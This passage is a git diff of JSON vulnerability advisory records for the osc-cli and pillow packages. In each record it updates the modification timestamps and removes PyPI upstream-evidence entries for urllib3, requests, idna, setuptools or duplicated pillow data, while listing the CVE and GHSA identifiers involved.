-2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2019-11236", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-r64q-w8jr-g9qp", "CVE-2019-11236", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2019-11324.json b/advisories/BREW-osc-cli-CVE-2019-11324.json index 90252c87de..b536453bcc 100644 --- a/advisories/BREW-osc-cli-CVE-2019-11324.json +++ b/advisories/BREW-osc-cli-CVE-2019-11324.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2019-11324", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-mh33-7rrq-662w", "CVE-2019-11324", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2020-26137.json b/advisories/BREW-osc-cli-CVE-2020-26137.json index 58e6e0f23c..85562e2745 100644 --- a/advisories/BREW-osc-cli-CVE-2020-26137.json +++ b/advisories/BREW-osc-cli-CVE-2020-26137.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2020-26137", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-wqvq-5m8c-6g24", "CVE-2020-26137", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2020-7212.json b/advisories/BREW-osc-cli-CVE-2020-7212.json index a11525110b..69c9a57d86 100644 --- a/advisories/BREW-osc-cli-CVE-2020-7212.json +++ b/advisories/BREW-osc-cli-CVE-2020-7212.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2020-7212", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-hmv2-79q8-fv6g", "CVE-2020-7212", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2021-28363.json b/advisories/BREW-osc-cli-CVE-2021-28363.json index 1c3b208fa0..c91207ff40 100644 --- a/advisories/BREW-osc-cli-CVE-2021-28363.json +++ b/advisories/BREW-osc-cli-CVE-2021-28363.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2021-28363", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-5phf-pp7p-vc2r", "CVE-2021-28363", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2021-33503.json b/advisories/BREW-osc-cli-CVE-2021-33503.json index 38f86443bc..25d2274fb3 100644 --- a/advisories/BREW-osc-cli-CVE-2021-33503.json +++ b/advisories/BREW-osc-cli-CVE-2021-33503.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2021-33503", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-q2q7-5pp4-w6pg", "CVE-2021-33503", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2022-40897.json b/advisories/BREW-osc-cli-CVE-2022-40897.json index e408b77a53..41f466e09d 100644 --- a/advisories/BREW-osc-cli-CVE-2022-40897.json +++ b/advisories/BREW-osc-cli-CVE-2022-40897.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2022-40897", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-r9hx-vwmv-q579", "BIT-setuptools-2022-40897", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2023-32681.json b/advisories/BREW-osc-cli-CVE-2023-32681.json index 6d12ba5652..cf87375afb 100644 --- a/advisories/BREW-osc-cli-CVE-2023-32681.json +++ b/advisories/BREW-osc-cli-CVE-2023-32681.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2023-32681", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-j8r2-6x86-q33q", "CVE-2023-32681", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2023-43804.json b/advisories/BREW-osc-cli-CVE-2023-43804.json index 22c9d3d9a0..4662f48346 100644 --- a/advisories/BREW-osc-cli-CVE-2023-43804.json +++ b/advisories/BREW-osc-cli-CVE-2023-43804.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2023-43804", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-v845-jxx5-vc9f", "CVE-2023-43804", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2023-45803.json b/advisories/BREW-osc-cli-CVE-2023-45803.json index 3ac7d798c2..594bb56a02 100644 --- a/advisories/BREW-osc-cli-CVE-2023-45803.json +++ b/advisories/BREW-osc-cli-CVE-2023-45803.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2023-45803", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-g4mx-q9vg-27p4", "CVE-2023-45803", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2024-35195.json b/advisories/BREW-osc-cli-CVE-2024-35195.json index ef98425216..0ab01fd670 100644 --- a/advisories/BREW-osc-cli-CVE-2024-35195.json +++ b/advisories/BREW-osc-cli-CVE-2024-35195.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2024-35195", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-9wx4-h78v-vm56", "CVE-2024-35195", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2024-3651.json b/advisories/BREW-osc-cli-CVE-2024-3651.json index 49dcc5d975..6ad483ba85 100644 --- a/advisories/BREW-osc-cli-CVE-2024-3651.json +++ b/advisories/BREW-osc-cli-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2024-3651", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2024-37891.json b/advisories/BREW-osc-cli-CVE-2024-37891.json index c03bc4c2bc..9950f78ea5 100644 --- a/advisories/BREW-osc-cli-CVE-2024-37891.json +++ b/advisories/BREW-osc-cli-CVE-2024-37891.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2024-37891", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-34jh-p97f-mpxf", "CVE-2024-37891", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2024-47081.json b/advisories/BREW-osc-cli-CVE-2024-47081.json index 5b2238fd26..5eb7e77c69 100644 --- a/advisories/BREW-osc-cli-CVE-2024-47081.json +++ b/advisories/BREW-osc-cli-CVE-2024-47081.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2024-47081", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-9hjg-9r4m-mvj7", "CVE-2024-47081", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2024-6345.json b/advisories/BREW-osc-cli-CVE-2024-6345.json index 3f97cf86ff..2f5ab62ee3 100644 --- a/advisories/BREW-osc-cli-CVE-2024-6345.json +++ b/advisories/BREW-osc-cli-CVE-2024-6345.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2024-6345", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-cx63-2mw6-8hw5", "BIT-setuptools-2024-6345", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2025-47273.json b/advisories/BREW-osc-cli-CVE-2025-47273.json index dcac4e2581..98e0d1bb4d 100644 --- a/advisories/BREW-osc-cli-CVE-2025-47273.json +++ b/advisories/BREW-osc-cli-CVE-2025-47273.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2025-47273", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-5rjg-fvgr-3xxf", "BIT-setuptools-2025-47273", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2025-50181.json b/advisories/BREW-osc-cli-CVE-2025-50181.json index eb6f66672c..24ee133f7c 100644 --- a/advisories/BREW-osc-cli-CVE-2025-50181.json +++ b/advisories/BREW-osc-cli-CVE-2025-50181.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2025-50181", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-pq67-6m6q-mj2v", "CVE-2025-50181", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2025-50182.json b/advisories/BREW-osc-cli-CVE-2025-50182.json index 13936743a0..c95af36e25 100644 --- a/advisories/BREW-osc-cli-CVE-2025-50182.json +++ b/advisories/BREW-osc-cli-CVE-2025-50182.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2025-50182", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-48p4-8xcf-vxj5", "CVE-2025-50182", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2025-66418.json b/advisories/BREW-osc-cli-CVE-2025-66418.json index dbf1c94288..2a1a75808a 100644 --- a/advisories/BREW-osc-cli-CVE-2025-66418.json +++ b/advisories/BREW-osc-cli-CVE-2025-66418.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2025-66418", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-gm62-xv2j-4w53", "CVE-2025-66418", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2025-66471.json b/advisories/BREW-osc-cli-CVE-2025-66471.json index 0bb36d9e02..7f1719287a 100644 --- a/advisories/BREW-osc-cli-CVE-2025-66471.json +++ b/advisories/BREW-osc-cli-CVE-2025-66471.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2025-66471", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-2xpw-w6gg-jr37", "CVE-2025-66471", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2026-21441.json b/advisories/BREW-osc-cli-CVE-2026-21441.json index a5fed7b6b5..ab00941c1e 100644 --- a/advisories/BREW-osc-cli-CVE-2026-21441.json +++ b/advisories/BREW-osc-cli-CVE-2026-21441.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2026-21441", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-38jv-5279-wg99", "CVE-2026-21441", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2026-25645.json b/advisories/BREW-osc-cli-CVE-2026-25645.json index de37a4d699..e3caf1d0e0 100644 --- a/advisories/BREW-osc-cli-CVE-2026-25645.json +++ b/advisories/BREW-osc-cli-CVE-2026-25645.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2026-25645", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-gc5v-m9x4-r6x2", "CVE-2026-25645", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2026-44431.json b/advisories/BREW-osc-cli-CVE-2026-44431.json index 1bba640122..3fbf8dc757 100644 --- a/advisories/BREW-osc-cli-CVE-2026-44431.json +++ b/advisories/BREW-osc-cli-CVE-2026-44431.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2026-44431", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-qccp-gfcp-xxvc", "CVE-2026-44431", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2026-44432.json b/advisories/BREW-osc-cli-CVE-2026-44432.json index d179b95a68..87fd2b2143 100644 --- a/advisories/BREW-osc-cli-CVE-2026-44432.json +++ b/advisories/BREW-osc-cli-CVE-2026-44432.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2026-44432", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-mf9v-mfxr-j63j", "CVE-2026-44432", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2026-45409.json b/advisories/BREW-osc-cli-CVE-2026-45409.json index e6e9240108..475fb81629 100644 --- a/advisories/BREW-osc-cli-CVE-2026-45409.json +++ b/advisories/BREW-osc-cli-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2026-45409", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-osc-cli-CVE-2026-59890.json b/advisories/BREW-osc-cli-CVE-2026-59890.json index 8169652e81..97c9eaeba7 100644 --- a/advisories/BREW-osc-cli-CVE-2026-59890.json +++ b/advisories/BREW-osc-cli-CVE-2026-59890.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-osc-cli-CVE-2026-59890", "published": "2026-08-13T17:24:18Z", - "modified": "2026-08-13T17:24:18Z", + "modified": "2026-09-10T20:16:54Z", "upstream": [ "GHSA-h35f-9h28-mq5c", "BIT-setuptools-2026-59890", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pillow-CVE-2014-1932.json b/advisories/BREW-pillow-CVE-2014-1932.json index 0e3dae9b7c..a193c2d854 100644 --- a/advisories/BREW-pillow-CVE-2014-1932.json +++ b/advisories/BREW-pillow-CVE-2014-1932.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2014-1932", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "GHSA-x895-2wrm-hvp7", "CVE-2014-1932", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pillow-CVE-2014-1933.json b/advisories/BREW-pillow-CVE-2014-1933.json index 416abd50df..c44d48a12b 100644 --- a/advisories/BREW-pillow-CVE-2014-1933.json +++ b/advisories/BREW-pillow-CVE-2014-1933.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2014-1933", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "GHSA-r854-96gq-rfg3", "CVE-2014-1933", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pillow-CVE-2014-3007.json b/advisories/BREW-pillow-CVE-2014-3007.json index a8fe6243e6..a00038288f 100644 --- a/advisories/BREW-pillow-CVE-2014-3007.json +++ b/advisories/BREW-pillow-CVE-2014-3007.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2014-3007", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "GHSA-8m9x-pxwq-j236", "CVE-2014-3007", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pillow-CVE-2014-3589.json b/advisories/BREW-pillow-CVE-2014-3589.json index 31b4a5d066..5b0c97252d 100644 --- a/advisories/BREW-pillow-CVE-2014-3589.json +++ b/advisories/BREW-pillow-CVE-2014-3589.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2014-3589", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "GHSA-cfmr-38g9-f2h7", "CVE-2014-3589", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pillow-CVE-2014-3598.json b/advisories/BREW-pillow-CVE-2014-3598.json index 5879f53a40..99e0b1643f 100644 --- a/advisories/BREW-pillow-CVE-2014-3598.json +++ b/advisories/BREW-pillow-CVE-2014-3598.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2014-3598", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "GHSA-j6f7-g425-4gmx", "CVE-2014-3598", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pillow-CVE-2014-9601.json b/advisories/BREW-pillow-CVE-2014-9601.json index 45acd568aa..e42835fdd1 100644 --- a/advisories/BREW-pillow-CVE-2014-9601.json +++ b/advisories/BREW-pillow-CVE-2014-9601.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2014-9601", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "GHSA-h5rf-vgqx-wjv2", "CVE-2014-9601", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-pillow-CVE-2016-0740.json b/advisories/BREW-pillow-CVE-2016-0740.json index 4b6a2074c7..0b8815431e 100644 --- a/advisories/BREW-pillow-CVE-2016-0740.json +++ b/advisories/BREW-pillow-CVE-2016-0740.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2016-0740", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2016-0740", "GHSA-hggx-3h72-49ww", @@ -54,13 +54,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2016-0775.json b/advisories/BREW-pillow-CVE-2016-0775.json index 7c281b253d..41ab7b10d0 100644 --- a/advisories/BREW-pillow-CVE-2016-0775.json +++ b/advisories/BREW-pillow-CVE-2016-0775.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2016-0775", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", "upstream": [ "CVE-2016-0775", "GHSA-8xjv-v9xq-m5h9", @@ -54,13 +54,6 @@ "subject_version": "12.3.0", "key": "pkg:pypi/pillow@12.3.0" }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pillow", - "subject_version": "12.3.0", - "key": "pkg:pypi/pillow@12.3.0" - }, { "strategy": "distro", "ecosystem": "Debian", diff --git a/advisories/BREW-pillow-CVE-2016-2533.json b/advisories/BREW-pillow-CVE-2016-2533.json index 772308b756..b7654aac87 100644 --- a/advisories/BREW-pillow-CVE-2016-2533.json +++ b/advisories/BREW-pillow-CVE-2016-2533.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-pillow-CVE-2016-2533", "published": "2026-08-13T17:28:20Z", - "modified": "2026-08-13T17:28:20Z", + "modified": "2026-09-10T20:25:15Z", 